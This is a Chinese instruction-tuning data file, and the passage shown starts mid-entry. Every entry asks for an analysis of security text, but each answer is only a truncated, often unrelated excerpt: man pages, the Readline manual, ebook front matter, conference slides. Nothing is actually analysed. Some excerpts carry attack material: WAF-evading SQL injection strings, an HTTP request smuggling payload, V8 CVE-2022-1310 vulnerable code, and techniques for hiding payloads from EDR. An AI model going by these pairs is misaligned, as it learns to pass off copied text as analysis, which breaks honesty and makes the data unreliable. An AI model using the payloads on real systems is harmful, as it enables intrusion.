signature problem v Anti-Virus == Web Scanners v Solution: Evolve unique exploits for web applications v Web Application Firewall blocks or 1=1 -- ? v Evolve from v or 1=1 -- v To: v Aso1239;or 2=1 or 1=3 or 1=1 --asdl1ojcud//\\ Evolutionary Algorithms In English: 1. Create a large number of creatures 2. While solution/goal != found: 1. Score all of the creatures performance using a fitness function 2. Kill the weak performing 3. Breed the strong performing 4. Mutate creatures randomly 3. Display the creature that solved the solution Exploit Evolution 1. Create a large number of strings 2. While exploit != successful: 1. Send the string as parameter value (I.E. POST, GET, etc.) 2. Use the response from the server to determine the score 1. ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGNU Readline Library Edition 6.1, for Readline Library Version 6.1. October 2009 Chet Ramey, Case Western Reserve University Brian Fox, Free Software Foundation This manual describes the GNU Readline Library (version 6.1, 9 October 2009), a library which aids in the consistency of user interface across discrete programs which provide a command line interface. Copyright c 19882009 Free Software Foundation, Inc. Permission is granted to make and distribute verbatim copies of this manual provided the copyright notice and this permission notice are preserved on all copies. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, with the Front-Cover texts being A GNU Manual, and with the Back-Cover Texts as in (a) below. A copy of the license is included in the section entitled GNU Free Documentation License. (a) The FSFs Back-Cover Text is: You are free to copy and modify this GNU manual. Buying copies from GNU Press supports the FSF in developing GNU and promoting software freedom. Published by the Free Software Foundation 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA i Table of Contents 1 Command Line Editing . . . . . . . . . . . . . . . . . . . . . . . . 1 1.1 Introduction to Line Editing. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.2 Readline Interaction. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.2.1 Readline Bare Essentials. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 1.2.2 Readline Movement Commands. . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.2.3 Readline Killing Commands . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.2.4 Readline Arguments. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.2.5 Searching for Commands in ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH FMT 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 fmt \\- 简单的文本优化格式化工具 .SH 概述 \\fBfmt\\fP [\\fI\\,\\-宽度\\/\\fP] [\\fI\\,选项\\/\\fP]... [\\fI\\,文件\\/\\fP]... .SH 描述 .\\\" Add any additional description here .PP 对给定文件的每一段进行重新格式化写入到标准输出选项\\fB\\-宽度\\fP是\\fB\\-\\-width\\fP=\\fI\\,宽度数字\\/\\fP的缩写 .PP 如果没有指定文件或者指定文件为\\-则从标准输入读取 .PP 必选参数对长短选项同时适用 .TP \\fB\\-c\\fP, \\fB\\-\\-crown\\-margin\\fP 保持前两行的缩进 .TP \\fB\\-p\\fP, \\fB\\-\\-prefix\\fP=\\fI\\,STRING\\/\\fP 只对以指定字符串开头的行重新格式化将前缀重新附着到被重新格式化的行上 .TP \\fB\\-s\\fP, \\fB\\-\\-split\\-only\\fP 分割过长的行但不自动补足 .TP \\fB\\-t\\fP, \\fB\\-\\-tagged\\-paragraph\\fP 对第一行进行缩进以和第二行区分 .TP \\fB\\-u\\fP, \\fB\\-\\-uniform\\-spacing\\fP 单词间保留一个空格每句之后保留两个空格 .TP \\fB\\-w\\fP, \\fB\\-\\-width\\fP=\\fI\\,宽度\\/\\fP 最大行宽默认为 75 列 .TP \\fB\\-g\\fP, \\fB\\-\\-goal\\fP=\\fI\\,目标宽度\\/\\fP 目标宽度默认为上述最大行宽的 93% .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SH 作者 由 Ross Paterson 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 完整文档请见 <https://www.gnu.org/software/coreutils/fmt> .br 或者在本地使用 info \\(aq(coreutils) fmt invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Chrome V8命令执行漏洞CVE-2022-1310 > @btiszka报告于2022年3月18日, google 更新于2022年4月11日 ### 漏洞描述 chrome V8 引擎的垃圾回收机制中在处理Number类型数据时没有考虑Smi值溢出的情况致使新分配的HeapNumber对象破坏了Write-Barrier机制造成UAF最终导致了任意代码执行 ### 影响范围 chrome v100.0.4896.88前版本 ### 漏洞详情 #### 漏洞位置 ```cpp MaybeHandle<Object> RegExpUtils::SetLastIndex(Isolate* isolate, Handle<JSReceiver> recv, uint64_t value) { Handle<Object> value_as_object = isolate->factory()->NewNumberFromInt64(value); /*** A ***/ if (HasInitialRegExpMap(isolate, *recv)) { /*** B ***/ JSRegExp::cast(*recv).set_last_index(*value_as_object, SKIP_WRITE_BARRIER); /*** C ***/ return recv; } else { return Object::SetProperty( isolate, recv, isolate->factory()->lastIndex_string(), value_as_object, StoreOrigin::kMaybeKeyed, Just(kThrowOnError)); } } ``` #### 漏洞触发条件 将最大 smi 1073741823 存储到 `last_index` 中`AdvancedStringIndex` 会将其递增为 `1073741824`然后 `NewNumberFromInt64` 会将其转换为 NewSpace 中的 `HeapNumber`最后是 `JSRegExp ::cast(*recv).set_last_index` 会将其存储到正则表达式对象中没有任何写障碍如果 regexp 对象在 old-space 中则 `NewNumberFromInt64` 分配的 HeapNumber 在 NewSpace 中并且发生 Minor GC 这会导致 `last_index` 成为悬空指针并指向 NewSpace 中的任意对象 #### 漏洞原理 当在JS代码中调用re[Symbol.replace]函数时V8引擎使用Runtime_RegExpReplaceRT函数进行处理函数中的异常退出分支会调用RegExpUtils::SetAdvancedStringIndex该函数最终将re.lastIndex加1并写回re对象中 ![ttt](png/chrome_v8_UAF_1.png) 可见上述函数功能约等于re.lastIndex += 1对于类似的代码逻辑在底层语言中通常需要考虑边界值防止出现数据溢出V8中的Number类型分为Smi和HeapNumberSmi代表了小整数和对象中的指针共享存储空间通过值的最低位是否为0来区分类型超出Smi表示范围的值会在堆中创建HeapNumber对象来表示在32位环境下Smi值的范围为-230到230  1 ![ttt](png/chrome_v8_UAF_2.png) 根据上述逻辑当我们对RegExp对象赋值re.lastIndex=1073741823并进入Runtime_RegExpReplaceRT函数逻辑时由于加1后的值1073741824超过Smi的表示范围V8引擎在堆中重新申请了一个HeapNumber对象来存储新的lastIndex值此时该RegExp对象的lastIndex属性不再是一个Smi数而是一个指向堆中HeapNumber对象的指针如下图所示 ![ttt](png/chrome_v8_UAF_3.png) 在之前的垃圾回收中已经介绍V8的Minor GC的Write-Barrier机制需要对将新生代内存中的新建对象置灰并添加到标记列表中以省略对老年代对象的遍历但函数SetLastIndex在处理RegExp对象存在初始化Map情况的代码分支中默认lastIndex是一个Smi值并使用SKIP_WRITE_BARRIER标记跳过了写屏障因此当re.lastIndex变成了HeapNumber对象又没有被Write-Barrier标记那么在GC发生时该对象就会被当作可回收对象被释放释放后re.lastInde", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 1 2 2 3 3 4 4 D D C C B B A A 30V TVS1 SMAJ30A GND RAW GND Power Protection 4 1, 2, 3 5, 6, 7, 8 Q1 IRF9388 12V0 5V Switching Regulator 5V0 12V0 GND Cer./Tant. 10V/16V C2 10uF GND GND 2A Hold 4A Trip PTC1 LittleFuse 2920L200/24 D1 R1 330 GND 5V0 Power LED GND GND GND 5V0 GND GND GND 5V0 Beagle Bone Connections 3V3 3V3 SYS 5V SYS 5V 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 P1 BeagleBone Cape Header P8 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 P2 BeagleBone Cape Header P9 Vin 1 GND 2 Vout 3 Murata 78S Series VR1 50v Alum. Elec. C1 100uF A1 1 VccA 2 A2 3 A3 4 A4 5 A5 6 A6 7 A7 8 A8 9 OE 10 GND 11 B8 12 B7 13 B6 14 B5 15 B4 16 B3 17 B2 18 VccB 19 B1 20 TI TXS108E Bi-Directional Level Shifter U6 GND 3V3 J1708 RX BB J1708-2 TX BB J1708-2 RX BB Buffer-Enable TX CAN0 RX CAN0 TX CAN1 RX CAN1 J1708 RX J1708-2 TX J1708-2 RX TX DCAN0 BB RX DCAN0 BB TX DCAN1 BB RX DCAN1 BB J1708 TX J1708 TX BB Buffer-Enable GPIO Monitor GPIO Monitor UART2 UART4 UART4 UART2 Drive High to enable 4.7k R16 GND TX DCAN0 BB RX DCAN0 BB TX DCAN1 BB RX DCAN1 BB C7 0.1uF GND J1708 RX BB J1708-2 TX BB J1708-2 RX BB J1708 TX BB J1708-2 RX BB J1708 RX BB Truck Duck Revision 3 Title: Sheet 1 of 2 Date Last Modified: Six_Volts 7/7/2016 Version: Check for the latest version and updates at: truckhacking.github.io PIC101 PIC102 COC1 PIC201 PIC202 COC2 PIC701 PIC702 COC7 PID101 PID102 COD1 PIP101 PIP102 PIP103 PIP104 PIP105 PIP106 PIP107 PIP108 PIP109 PIP1010 PIP1011 PIP1012 PIP1013 PIP1014 PIP1015 PIP1016 PIP1017 PIP1018 PIP1019 PIP1020 PIP1021 PIP1022 PIP1023 PIP1024 PIP1025 PIP1026 PIP1027 PIP1028 PIP1029 PIP1030 PIP1031 PIP1032 PIP1033 PIP1034 PIP1035 PIP1036 PIP1037 PIP1038 PIP1039 PIP1040 PIP1041 PIP1042 PIP1043 PIP1044 PIP1045 PIP1046 COP1 PIP201 PIP202 PIP203 PIP204 PIP205 PIP206 PIP207 PIP208 PIP209 PIP2010 PIP2011 PIP2012 PIP2013", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbout This eBook ePUB is an open, industry-standard format for eBooks. However, support of ePUB and its many features varies across reading devices and applications. Use your device or app settings to customize the presentation to your liking. Settings that you can customize often include font, font size, single or double column, landscape or portrait mode, and figures that you can click or tap to enlarge. For additional information about the settings and features on your reading device or app, visit the device manufacturers Web site. Many titles include programming code or configuration examples. To optimize the presentation of these elements, view the eBook in single-column, landscape mode and adjust the font size to the smallest setting. In addition to presenting code and configurations in the reflowable text format, we have included images of the code that mimic the presentation found in the print book; therefore, where the reflowable format may compromise the presentation of the code listing, you will see a Click here to view code image link. Click the link to view the print-fidelity code image. To return to the previous page viewed, click the Back button on your device or app. Hacking Raspberry Pi Timothy L. Warner 800 East 96th Street, Indianapolis, Indiana 46240 USA Hacking Raspberry Pi Copyright  2014 by Que Publishing All rights reserved. No part of this book shall be reproduced, stored in a retrieval system, or transmitted by any means, electronic, mechanical, photocopying, recording, or otherwise, without written permission from the publisher. No patent liability is assumed with respect to the use of the information contained herein. Although every precaution has been taken in the preparation of this book, the publisher and author assume no responsibility for errors or omissions. Nor is any liability assumed for damages resulting from the use of the information contained herein. ISBN-13: 978-0-7897-5156-0 ISBN-10: 0-7897-5156-9 Library of Congress Contro", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGone in 60 Minutes: Stealing Sensitive Data from Thousands of Systems Simultaneously with OpenDLP Andrew Gavin Verizon Business Standard Disclaimer  I am representing myself, not my employer, with OpenDLP and this talk  If you get in trouble for using OpenDLP, it is your fault and not mine is your fault and not mine Gone in 60 Minutes: Stealing Sensitive Data from Thousands of Systems Simultaneously with OpenDLP || Twitter: @OpenDLP @andrewgavin Presentation Outline  What is OpenDLP?  Why write it?  How does OpenDLP's agent work?  Benchmarks: Agentless vs agent  Benchmarks: Agentless vs agent  Live demo of agent  Newly-implemented features  Future plans  Q&A Gone in 60 Minutes: Stealing Sensitive Data from Thousands of Systems Simultaneously with OpenDLP || Twitter: @OpenDLP @andrewgavin What is OpenDLP?  A data discovery tool with two components: Agent and web application  Webapp is LAMP, agent is Windows  Free and open source (GPLv3)  Free and open source (GPLv3)  Useful for:  Compliance personnel  Network/System administrators  Penetration testers Gone in 60 Minutes: Stealing Sensitive Data from Thousands of Systems Simultaneously with OpenDLP || Twitter: @OpenDLP @andrewgavin Why Write It?  Previous to OpenDLP, there was no free agent-based data discovery tool  Other available FOSS tools were all designed to be manually run from a single workstation:  Cornell Spider  Cornell Spider (http://www2.cit.cornell.edu/security/tools)  FindSSN (Sourceforge)  grep  These tools could be hacked as agentless scanners (using network shares)  Not practical for large deployments Gone in 60 Minutes: Stealing Sensitive Data from Thousands of Systems Simultaneously with OpenDLP || Twitter: @OpenDLP @andrewgavin How does OpenDLP work for agent- based scans? Gone in 60 Minutes: Stealing Sensitive Data from Thousands of Systems Simultaneously with OpenDLP || Twitter: @OpenDLP @andrewgavin Create a Reusable Policy  Administrator authentication credentials  Can also use pass-the-hash t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEDR Is Coming; Hide yo Sh!t @TTimzen @r00tkillah Who are we? Michael @r00tkillah Leibowitz Topher Timzen (@TTimzen) NSA Playset C# Malware is <3 Principle Troublemaker Principal Vulnerability Enthusiast RED TEAM ! ! ! ! Agenda  What is EDR and why do we care?  UEFI security and variables overview  Windows platform hijinks with demo  Linux platform hijinks with demo  What does this all mean?  Mitigations and Recommendations  Future work  Conclusions EDR Enterprise Detection and Response (EDR) Defensive tooling that focuses on detecting, investigating and mitigating suspicious activities on hosts and endpoints. Provides Blue Team a hunt capability Alerts mapped to MITRE ATT&CK via a SIEM or EDR directly CrowdStrike and Carbon Black are big players in this space MITRE ATT&CK - https://attack.mitre.org/ Knowledge base of adversary tactics and techniques based on real-world observation - Tactics, Techniques, Procedures (TTP) Enterprise Detection and Response (EDR) Tuned for processes, commands and API Calls  cmd.exe /c  powershell.exe  Registry modifications  Scheduled Tasks All of these mapped to MITRE TTPs The Other Risk Curve Time -> Likelihood of Detection Initial shell popped Persistence phase starts Result of EDR Analyst You The Other Risk Curve (Modified) Time -> Likelihood of Detection Initial shell popped Persistence phase starts UEFI Unified Extensible Firmware Interface (UEFI) Trusted Platforms UEFI, PI and TCG-based firmware (Zimmer, Dasari, & Brogan, 2009, p. 16) But Why UEFI Firmware Variables? Hides payload from AV, and EDR, and requires memory forensics to investigate EDR platform getting your reader binary doesnt mean anything Tons of places to hide there!  Test0 E660597E-B94D-4209-9C80-1805B5D19B69 NV+BS+RT  Test1 E660597E-B94D-4209-9C80-1805B5D19B69 NV+BS+RT UEFI Firmware Variables Authenticated  Secure boot nonsense (PK, KEK, db/dbx)  Performs a certificate check when writing variable Unauthenticated  No verification on write  Majority of variables ar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLocking Down Mac OS X Def Con 11 Jay Beale Bastille Linux JJB Security Consulting, LLC. GWU Cyber Security Policy & Research Institute Talk Contents This talk with cover  Auditing the core operating system.  Choosing tigher settings.  Automating this process with Bastille Linux. Auditing OS X One hour of lock-down:  Boot security audit  Daemon Audit  Network daemons After that?  Set-UID/Set-GID Audit  Audit cron jobs  Configure daemons for better security Mac OS X Roots  FreeBSD  Next (Steve Jobs)  Mach (Darwin) kernel Boot Security - Single User Mode? Attack: Hold down -S during boot to boot directly into single user mode. Defense:  Alter rc.boot to require some authentication before allowing boot to continue. Alter rc.boot? secureit inserts the following into rc.boot: if [ \"${BootType}\" = \"singleuser\" ];then password.pl fi password.pl is his perl script to check against a pre-set password. Can we break this? (http://www.osxscripts.com/secureit.html) Replace the kernel? You could replace the kernel with one where single user mode is inaccessible, as described here: http://www.securemac.com/ disablemacosxsingleboot.php This could be a problem during your first hardware failure, though. Boot Security - Boot from CD?  Like most operating systems, obtaining root from boot is insanely easy.  Hold down the Option key while booting, insert the OS X cd, and run the password utility. Boot Security - Countermeasure Activate the Open firmware password. 1. Boot into firmware: Command+Option+O+F 2. Type password 3. Type setenv security-mode command 4. Type reset-all 5. (command = password for non-standard boot) 6. (full = password for any boot) (http://www.securemac.com/openfirmwarepasswordprotection.php) Autologin Prob: The login screen is bypassed, by default. Soln: Deactivate Autologin. (System Preferences ->Accounts->Users-> Log in automatically as user) /Library/Preferences/com.apple.loginwindow.plist Remove key autoLoginUser manually or via defaults command. Restart and s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Lua --- **官网** - http://www.lua.org/ **教程** - https://www.runoob.com/lua/lua-tutorial.html --- ## 环境安装 **Linux 系统上安装** ``` curl -R -O http://www.lua.org/ftp/lua-5.4.3.tar.gz tar zxf lua-5.4.3.tar.gz cd lua-5.4.3 make linux test make install ``` 其他版本如果报错需要装 ```bash # centos yum install readline-devel # debian apt-get install libreadline-dev ``` 或 ``` f8x -lua ``` **测试** ``` vim test.lua print(\"Hello World!\") ``` ```bash lua test.lua ``` **Window 系统上安装 Lua** - https://github.com/rjpcomputing/luaforwindows - http://luadist.org/ --- ## 使用 lua 和 python 一样都提供了交互式编程模式和脚本式编程模式 直接输入 lua 即可进入交互式编程模式 将 Lua 程序代码保存到一个以 lua 结尾的文件并执行该模式称为脚本式编程", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHTTP Request Smuggling in 2020 Amit Klein Safebreach Labs About Me  29 years in InfoSec  VP Security Research Safebreach (2015-Present)  30+ Papers, dozens of advisories against high profile products  Presented in BlackHat (3 times), DefCon (twice), Usenix, NDSS, HITB, InfoCom, DSN, RSA, CertConf, Bluehat, OWASP Global (keynote), OWASP EU, AusCERT (keynote) and more  http://www.securitygalore.com Introduction What is HTTP Request Smuggling?  3 Actors  Attacker (client)  Proxy/firewall  Web server (or another proxy/firewall)  Attack  Attacker connects (80/tcp) to the proxy, sends ABC  Proxy interprets as AB, C, forwards to the web server  Web server interprets as A, BC, responds with r(A), r(BC)  Proxy caches r(A) for AB, r(BC) for C.  AKA HTTP desync Attack Different interpretations of the TCP stream POST /hello.php HTTP/1.1 ... Content-Length: 0 Content-Length: 44 GET /poison.html HTTP/1.1 Host: www.example.com Something: GET /target.html HTTP/1.1 Different interpretations of the TCP stream POST /hello.php HTTP/1.1 ... Content-Length: 0 Content-Length: 44 GET /poison.html HTTP/1.1 Host: www.example.com Something: GET /target.html HTTP/1.1 Caching Proxy (last CL) 1. /hello.php (44 bytes in body) 2. /target.html Different interpretations of the TCP stream POST /hello.php HTTP/1.1 ... Content-Length: 0 Content-Length: 44 GET /poison.html HTTP/1.1 Host: www.example.com Something: GET /target.html HTTP/1.1 Web Server (first CL) 1. /hello.php (0 bytes in body) 2. /poison.html (+headers) Different interpretations of the TCP stream POST /hello.php HTTP/1.1 ... Content-Length: 0 Content-Length: 44 GET /poison.html HTTP/1.1 Host: www.example.com Something: GET /target.html HTTP/1.1 Caching Proxy (last CL) 1. /hello.php (44 bytes in body) 2. /target.html Web Server (first CL) 1. /hello.php (0 bytes in body) 2. /poison.html (+headers) A Short History  2005  the seminal paper HTTP Request Smuggling is published  2005-2006  some short research pieces  Can HTTP Request Smuggling ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH TAIL 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 tail \\- 输出文件的末尾部分 .SH 概述 \\fBtail\\fP [\\fI\\,选项\\/\\fP]... [\\fI\\,文件列表\\/\\fP]... .SH 描述 .\\\" Add any additional description here .PP 将文件列表中每个文件的倒数10行内容输出至标准输出如果指定多个文件则会在每个文件的部分之前添加给定文件名称 .PP 如果没有指定文件或者指定文件为\\-则从标准输入读取 .PP 必选参数对长短选项同时适用 .TP \\fB\\-c\\fP, \\fB\\-\\-bytes\\fP=\\fI\\,[\\/\\fP+]NUM 输出最后 NUM 个字节或者使用 \\fB\\-c\\fP +NUM 输出每个文件从第 NUM 个字节开始的数据 .TP \\fB\\-f\\fP, \\fB\\-\\-follow[=\\fP{name|descriptor}] 随文件增长即时输出新增数据 .IP 若未给定选项参数则默认使用 'descriptor' .TP \\fB\\-F\\fP 和 \\fB\\-\\-follow\\fP=\\fI\\,name\\/\\fP \\fB\\-\\-retry\\fP 相同 .TP \\fB\\-n\\fP, \\fB\\-\\-lines\\fP=\\fI\\,[\\/\\fP+]NUM output the last NUM lines, instead of the last 10; or use \\fB\\-n\\fP +NUM to output starting with line NUM .TP \\fB\\-\\-max\\-unchanged\\-stats\\fP=\\fI\\,N\\/\\fP with \\fB\\-\\-follow\\fP=\\fI\\,name\\/\\fP, reopen a FILE which has not .IP changed size after N (default 5) iterations to see if it has been unlinked or renamed (this is the usual case of rotated log files); with inotify, this option is rarely useful .TP \\fB\\-\\-pid\\fP=\\fI\\,PID\\/\\fP 和 \\fB\\-f\\fP 同时使用时在进程号为 PID 的进程结束后终止执行 .TP \\fB\\-q\\fP, \\fB\\-\\-quiet\\fP, \\fB\\-\\-silent\\fP 不输出含有文件名的头 .TP \\fB\\-\\-retry\\fP 如果文件无法访问一直重复尝试打开文件 .TP \\fB\\-s\\fP, \\fB\\-\\-sleep\\-interval\\fP=\\fI\\,N\\/\\fP 和 \\fB \\-f\\fP 同时使用时在两次迭代之间睡眠约 N 秒默认 1.0 秒内核支持 inotify 且使用了 \\fB\\-\\-pid\\fP=\\fI\\,P\\/\\fP 时每 N 秒至少检查一次进程 P .TP \\fB\\-v\\fP, \\fB\\-\\-verbose\\fP 总是输出含有文件名的头 .TP \\fB\\-z\\fP, \\fB\\-\\-zero\\-terminated\\fP 以 NUL 作为行的分隔符而非换行符 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .PP NUM 后面可以加上乘数后缀b 512kB 1000K 1024MB 1000*1000M 1024*1024, GB 1000*1000*1000G 1024*1024*1024TPEZY 以此类推 也可以使用二进制前缀KiB=KMiB=M以此类推 .PP With \\fB\\-\\-follow\\fP (\\fB\\-f\\fP), tail defaults to following the file descriptor, which means that e", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBio About Me With VN Security since year 2009 Almost Every Weekend > CTF player > Weekend gamer Running zxandora.com project. Most of the time > Soon > Very Soon > Brand New Online Sandbox Hack in The Box Crew Once a year > Good friends > CTF CTF and CTF About Me > 2008, Hack In The Box CTF Winner > 2010, Hack In The Box Speaker, Malaysia > 2012, Codegate Speaker, Korea > 2015, VXRL Speaker, Hong Kong > 2015, HITCON CTF, Prequal Top 10 > 2016, Codegate CTF, Prequal Top 5 > 2016, Qcon Speaker, Beijing > OSX, Local Privilege Escalation > Code commit for metasploit 3 > GDB Bug hunting > Metasploit module > Linux Randomization Bypass > http://www.githiub.com/xwings/tuya > 微博: @kaijern vnsecurity.net Introduction > Active CTF Player (CLGT) > Active speaker at conferences > Blackhat USA > Tetcon > Hack In The Box > Xcon > Our Tools > PEDA > Unicorn/ Capstone/ Keystone > Xandora > OllyDbg, Catcha! > ROPEME > Security Researcher > Active speaker at conferences > Blackhat USA > Syscan > Hack In The Box > Xcon > Research Topics > Emulators > Virtualization > Binary Analysis > Tools for Malware Analysis VN Security Nguyen Anh Quynh > Nations > Vietnamese > Malaysian > Singaporean When gdb meets peda GDB PEDA Why KCON Fake Websites What Are These Things What Is Disassembler From binary to assembly code Core part of all binary analysis/ reverse engineering / debugger and exploit development Disassembly framework (engine/library) is a lower layer in stack of architecture Example  01D8 = ADD EAX,EBX (x86)  1169 = STR R1,[R2] (ARMs Thumb) Assembler Engine Binary Analysis Debugger Exploit Development CPU Emulator Engine Disassembler Engine What Is Emulator Software only CPU Emulator Core focus on CPU operations. Design with no machine devices Safe emulation environment Where else can we see CPU emulator. Yes, Antivirus Binary Analysis Debugger Exploit Development Assembler Engine Binary Analysis Debugger Exploit Development CPU Emulator Engine Disassembler Engine Example  01D1 = add", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Warmup (RE, 415p, 52 solved) Another classic reversing challenge. We get a [binary](rhapsody), ELF x64, statically compiled. Just like in warmup we can see a permutated flag in the strings: ```asm 00000000004a2739 db 0x73 ; 's' ; DATA XREF=sub_400a59+28, sub_400bf4+28, sub_400d0c+28, sub_4010e0+28 00000000004a273a db 0x00 ; '.' 00000000004a273b db 0x31 ; '1' ; DATA XREF=sub_400a9f+28, sub_400bae+28 00000000004a273c db 0x00 ; '.' 00000000004a273d db 0x34 ; '4' ; DATA XREF=sub_400ae5+28, sub_400b68+28, sub_40116c+28, sub_4011f8+28, sub_401310+28 00000000004a273e db 0x00 ; '.' 00000000004a273f db 0x74 ; 't' ; DATA XREF=sub_400c3a+28 00000000004a2740 db 0x00 ; '.' 00000000004a2741 db 0x4b ; 'K' ; DATA XREF=sub_400c80+28 00000000004a2742 db 0x00 ; '.' 00000000004a2743 db 0x68 ; 'h' ; DATA XREF=sub_400cc6+28 00000000004a2744 db 0x00 ; '.' 00000000004a2745 db 0x72 ; 'r' ; DATA XREF=sub_400d52+28, sub_400fc8+28 00000000004a2746 db 0x00 ; '.' 00000000004a2747 db 0x7b ; '{' ; DATA XREF=sub_400d98+28 00000000004a2748 db 0x00 ; '.' 00000000004a2749 db 0x33 ; '3' ; DATA XREF=sub_400dde+28, sub_40100e+28 00000000004a274a db 0x00 ; '.' 00000000004a274b db 0x4f ; 'O' ; DATA XREF=sub_400e24+28 00000000004a274c db 0x00 ; '.' 00000000004a274d db 0x6c ; 'l' ; DATA XREF=sub_400e6a+28, sub_400ef6+28 00000000004a274e db 0x00 ; '.' 00000000004a274f db 0x66 ; 'f' ; DATA XREF=sub_400eb0+28, sub_4011b2+28 00000000004a2750 db 0x00 ; '.' 00000000004a2751 db 0x67 ; 'g' ; DATA XREF=sub_400f3c+28 00000000004a2752 db 0x00 ; '.' 00000000004a2753 db 0x30 ; '0' ; DATA XREF=sub_400f82+28 00000000004a2754 db 0x00 ; '.' 00000000004a2755 db 0x6a ; 'j' ; DATA XREF=sub_401054+28 00000000004a2756 db 0x00 ; '.' 00000000004a2757 db 0x75 ; 'u' ; DATA XREF=sub_40109a+28 00000000004a2758 db 0x00 ; '.' 00000000004a2759 db 0x37 ; '7' ; DATA XREF=sub_401126+28, sub_401284+28 00000000004a275a db 0x00 ; '.' 00000000004a275b db 0x6e ; 'n' ; DATA XREF=sub_40123e+28 00000000004a275c db 0x00 ; '.' 00000000004a275d db 0x", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前言 最近正在写自动化的扫描器但是老是容易过快被ban代理ip和分布式成本可能也比较高 或者出现 不稳定都是假的只是因为我是学生没收入买不起服务器 那么如何优化现有的扫描过程即不降低速度 又不给ban呢 我把这个扫描 叫 华莱士喷射目录扫描 原来的扫描过程 华莱士喷射扫描 title: 目录扫描的小tips 就是把扫描顺序改变这样子目标越多的情况下同一个域名的扫描间隔时间越长被ban的可能性也 越低但是效率不会降低 在这个基础上 再加上分布式多线程随机代理等方法 更加稳健 工具 找了一圈没找到想要的这样子的工具同时又比较喜爱dirsearch一开始想魔改dirsearch的但是他 的代码逻辑太难改通读了一下以后重写了个demo刚刚写好bug一大堆先传到github先 2333 还没写的 多线程 分布式 字典的ext替换啥的各种各样的小bug - - Demo地址 bug一堆没完工 https://github.com/k0njac/arthinDir", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nREFLECTIONS HIDDEN POWER MODIFYING PROGRAMS AT RUN-TIME By J~~~~~~~ M~~~~~~ 5/27/08 i Contents Contents ...................................................................................................................................................... ii Abstract ...................................................................................................................................................... iv Glossary ....................................................................................................................................................... v Introduction ................................................................................................................................................ vi Implementation of Reflection Manipulation ................................................................................................ 1 Real Life Usage: Reflection 101 .................................................................................................................. 2 Implementing Reflection ............................................................................................................................. 4 Load an Assembly .................................................................................................................................... 4 Getting the Types From an Assembly ...................................................................................................... 4 Getting and Invoking Constructor of an Object Type .............................................................................. 4 Traversing Instantiated Objects .............................................................................................................. 6 Invoking Functionality on an Object ........................................................................................................ 6 Change the Values of an Object ......................................................................", "category": "text_analysis", "source": "security_papers"}
